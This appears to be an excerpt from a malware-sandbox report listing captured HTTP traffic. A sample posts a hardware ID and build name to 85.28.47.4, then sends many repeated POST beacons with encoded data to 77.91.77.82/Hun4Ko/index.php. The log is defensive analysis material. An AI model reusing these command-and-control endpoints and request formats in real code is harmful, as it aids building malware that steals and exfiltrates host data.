Source: global traffic HTTP traffic detected: POST /920475a59bac849d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FIIIIDGHJEBFBGDHDGIIHost: 85.28.47.4Content-Length: 214Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 36 30 43 39 36 36 38 33 39 32 37 32 30 32 39 37 34 31 31 31 39 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 46 49 49 49 49 44 47 48 4a 45 42 46 42 47 44 48 44 47 49 49 2d 2d 0d 0a Data Ascii: ------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="hwid"660C966839272029741119------FIIIIDGHJEBFBGDHDGIIContent-Disposition: form-data; name="build"default------FIIIIDGHJEBFBGDHDGII--
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 156Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 37 42 41 32 44 37 35 42 34 35 45 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A77BA2D75B45E82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Source: global traffic HTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
